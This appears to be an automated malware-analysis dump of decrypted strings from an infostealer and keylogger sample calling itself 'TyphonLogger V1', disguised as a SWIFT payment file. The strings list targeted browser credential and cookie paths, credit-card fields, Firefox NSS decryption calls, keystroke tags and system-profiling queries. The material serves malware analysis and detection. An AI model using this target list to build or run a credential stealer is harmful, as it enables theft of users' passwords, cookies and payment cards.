Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Current Language =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Installed Languages =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Current Date =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ===================================
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: =========== System Info ============
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: HWID =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: System Version =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Processor =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Graphics card =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Memory amount =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Anti-Virus =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Battery status =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Screen size =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: =========== Network Info ============
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Public IP =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Private IP =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Gateway IP =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: MAC address =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: BSSID =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: lKf0D797r2Iyt1DnNvPI9pD+M82z6su7r0besMvJ62kv+P1cEsvCbPMf
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Country =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Country ISO =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Region =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: City =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ZIP code =
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: \System Info.txt
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: \Installed Software.txt
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: SELECT * FROM Win32_Product
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: >
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: ;
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: .
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Faxxxxxxilxxxxexd xxtxxxxxxxxxxxxxxxo gxxxxxxxxxxxxxexxxxxxxxxxxxxxxxt laxxxxxxxxxxxxxxxxxxxxxxnxxxxxxgxxxxxxxxxxuxxxxxxxxxxxxxxxxaxxxxxxxxxxgxesx
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 4dubdtUHwBpTzgi0EuTOq6j4P8Kb0N2m+0rdiueMuCBgpKwxXZmcNL1R6RnWYw==
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Identifier
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Unknown
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Sxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxysxxxxxxxxxxxxxxtxxxxexxxxxxxxm
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: root\CIMV2
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: SELECT * FROM win32_operatingsystem
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: 5/XpXOcy5TB94U2mFffXr7njI4yw6tC9r07e9u25oGAypKQFXZOMIu5L6Ev+Ozcu0HVn5xZUhg==
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: aHR0cDovL2FwaS5pcGlmeS5vcmc=
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor:
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: kw==
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: \root\SecurityCenter2
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: Select * from AntivirusProduct
Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpack | String decryptor: displayName
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Not installed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ,
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: country_name
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: country_code
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: region
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: postal
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ipapi.co /#c-sharp-v1.03
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: +v+lV+Eysg995Q6iAuXIqZX1cOq17Mn12Ebe5Za2piZ9pqUSXJmN
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ProcessorId
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SELECT * FROM Win32_Processor
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Select * From Win32_ComputerSystem
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: TotalPhysicalMemory
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SELECT * FROM Win32_VideoController
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: , (
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: %)
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0Q==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd.MM.yyyy HH:mm:ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: SELECT * FROM Win32_Process Where SessionId='{0}'
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: PID:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ProcessId
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Process Name:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Executable Path:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ExecutablePath
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: =================
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Process List.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Screenshot.jpg
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Screenshot
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: _dd.MM.yyyy-HH.mm.ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: .jpg
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Current title matches Smart Logger target
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ### (
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd-MM-yyyy HH-mm-ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Screenshots
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd-MM-yyyy HH:mm:ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 9Q==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd-MM-yyyy dd-mm-ss
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \BuildTag.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dd-MM-yyyy
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Space
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Return
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Escape
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: LControlKey
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: RControlKey
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: RShiftKey
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: LShiftKey
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Tab
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Capital
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [ENTER]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [ESC]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [CTRL]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [Shift]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [Back]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [WIN]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [Tab]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [CAPSLOCK: ON]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: [CAPSLOCK: OFF]
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ###
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ###
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Unknown
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Battle.net
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Chromium\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Google\Chrome\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Google(x86)\Chrome\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Opera Software\
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \MapleStudio\ChromePlus\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Iridium\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \7Star\7Star\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \CentBrowser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Chedot\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Vivaldi\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Kometa\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Elements Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Epic Privacy Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \uCozMedia\Uran\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 9dysXPAv4H9G5A6bIvrCsqz/Od7y39ew+1vZuMO1uzt2sKwEXKq8ObxN6wL/PgRnxntx4Q==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \CatalinaGroup\Citrio\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Coowon\Coowon\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \liebao\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \QIP Surf\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Orbitum\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Comodo\Dragon\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Amigo\User\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Torch\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Yandex\YandexBrowser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Comodo\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \360Browser\Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Maxthon3\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \K-Melon\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Sputnik\Sputnik\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Nichrome\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \CocCoc\Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Uran\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Chromodo\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Mail.Ru\Atom\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 9di7U/QjwTBp/hqmA/P7ma7wJsnqwda6+FzVpPi8pTFg5YQAW5c=
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Microsoft\Edge\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 9dSfe8YP039M5R+3HuTGr7X+PvCJ1e2Rxm6QkcGvuSZxoOAkV4aaI6dH6Ajv
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Steam
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \CryptoTab Browser\User Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Mozilla\Firefox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Waterfox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \K-Meleon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Thunderbird
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Comodo\IceDragon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \8pecxstudios\Cyberfox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \NETGATE Technologies\BlackHaw
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Moonchild Productions\Pale Moon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Opera Software
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Web Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Login Data
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Network\Cookies
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Local State
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Credit Cards
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Credit Cards\CreditCards_(
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: )_[
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ].txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Passwords.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Cookies
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Cookies\Cookies_(
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \ImportantAutofills.txt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Autofills
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \Autofills\Autofills_(
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: logins
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: origin_url
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: username_value
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: password_value
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: credit_cards
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: name_on_card
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: expiration_month
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: expiration_year
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: cookies
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: host_key
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: expires_utc
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: secure
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: encrypted_value
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: value
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Opera
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: os_crypt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: encrypted_key
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Browser path:
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: does not exist
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Thunderbird
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: cookies.sqlite
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: moz_cookies
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Failed to copy files to decrypt passwords
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: logins.json
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ,"logins":\[
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ,"potentiallyVulnerablePasswords"
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: },
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Failed to set _profiles!
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: encryptedUsername
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: encryptedPassword
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Firefox
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: K-Melon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: IceDragon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Blackhawk
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Pale Moon
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: key3.db
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: key4.db
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: cert9.db
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ":"([^"]+)"
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \mozglue.dll
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \nss3.dll
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: NSS_Init
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: PK11SDR_Decrypt
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: NSS_Shutdown
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Failed to load NSS
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: y
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: PROCESSOR_ARCHITEW6432
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: ProgramFiles(x86)
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: C:\Users\
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \AppData\Roaming
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \logins.json
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \key4.db
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \places.sqlite
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: table
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: (
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: UNIQUE
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: false
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \\
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \"
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \n
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \r
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \t
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \b
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \f
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: \u
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: X4
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: JSON Parse: Too many closing brackets
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: JSON Parse: Quotation marks seems to be messed up.
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: :
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0NvMAlgfv13A83ZscbCVMycz94ox9Y8wNb9TDUtpV4XvjbwHAJGfRc0wQGM/YxT/Ww==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0NvPAVoTv17H93E5H7CLMgZ+9Yh49ZExM7UbR0poUM7w4boZEJfUWcAQR3MlYRK2AxLU/HzEdp+KxQoGW2RA6Q==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0NvNC1kUv1zJ8XNscLmXOicx/Ykz9Y80M7VTDUtqX9CCiqcNdLGeWokRE28qYhL+Sx3T/zfZFJ6WgGNEWWdB+4yNrUDxK6wswWPc26rgoR2RtL2ZpBj4iQqvWyu6SGIUwPu5ElwpdUJw0boW10NHNm2KbclKja+2AygEYfKF0znynduHd9mgTH1pkKNPtfoqta6i27cd549USMPYQzPQeNBJtIUKQawdWNnoRLIvDV6PN7oiq1iQTTIC4/Ei+hWJ9UYQcMrIbk9mdU5fGEIf1WvXLEEWUDTs8FdlNw==
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: 0NvGCF1880XJnD0hdv2ONGFe9Jc81MI0fa8QR0kEV9Ts59EEBPPyE8VZRnI3
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: {0}TRUE{1}FALSE{2}{3}{4}
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Name: {0}Value: {1}Application: {2}Stolen by: TyphonLogger V1==========================
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: email
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: e-mail
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: phone
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: usrname
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: login
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: address
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: creditcard
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: dob
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: pin
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: zip
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: paypal
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: crypto
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Name: {0}Value: {1}Stolen by: Log v2==========================
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: Type: {0}Number: {1}Expiry: {2}Holder: {3}Stolen by: TyphonLogger V1
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: /
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: URL: {0}Username: {1}Password: {2}Browser: {3}Stolen by: TyphonLogger V1==========================
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: .compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: bouncycastle.crypto
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.bouncycastle.crypto.dll.compressed
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura
                    Source: 0.2.SWIFT_USD_165092.exe.4068d70.1.raw.unpackString decryptor: costura.costura.dll.compressed
